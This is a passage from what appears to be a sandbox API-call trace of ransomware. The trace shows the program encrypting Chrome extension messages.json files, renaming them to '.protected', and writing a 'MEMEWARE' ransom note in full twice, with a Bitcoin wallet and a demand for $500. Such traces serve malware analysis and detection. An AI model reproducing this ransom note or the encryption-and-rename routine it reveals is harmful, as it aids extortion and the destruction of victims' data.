[0083.963] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.963] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.963] CloseHandle (hObject=0x164) returned 1 [0083.963] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0083.963] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0083.963] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr") returned 150 [0083.963] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0083.964] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0083.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\*") returned 152 [0083.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.964] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.964] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.964] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.964] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.964] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\.") returned 152 [0083.964] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.964] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.964] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.964] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.964] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.964] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.964] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\..") returned 153 [0083.964] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.964] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.964] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0083.964] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.964] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.964] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.964] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0083.965] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0083.965] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json") returned 164 [0083.965] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.965] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.966] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.967] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.967] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.967] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.967] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.967] CloseHandle (hObject=0x168) returned 1 [0083.967] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.protected") returned 174 [0083.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.protected")) returned 1 [0083.968] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.968] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.968] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\RESTORE_FILES.txt") returned 168 [0083.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.968] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.968] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.969] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.969] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.969] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.969] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.969] CloseHandle (hObject=0x164) returned 1 [0083.969] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0083.969] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0083.969] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv") returned 150 [0083.969] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0083.969] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0083.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\*") returned 152 [0083.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.970] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.970] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.970] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.970] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.970] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\.") returned 152 [0083.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.970] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.970] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.970] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.970] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.970] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.970] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\..") returned 153 [0083.970] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.970] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.970] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0083.970] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.970] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.970] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.970] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.971] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0083.971] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.971] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0083.971] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.971] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json") returned 164 [0083.971] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.971] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.973] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.973] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.973] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.973] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.973] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.973] CloseHandle (hObject=0x168) returned 1 [0083.973] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.protected") returned 174 [0083.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.protected")) returned 1 [0083.974] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.974] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.974] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\RESTORE_FILES.txt") returned 168 [0083.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.974] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.974] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.975] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.975] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 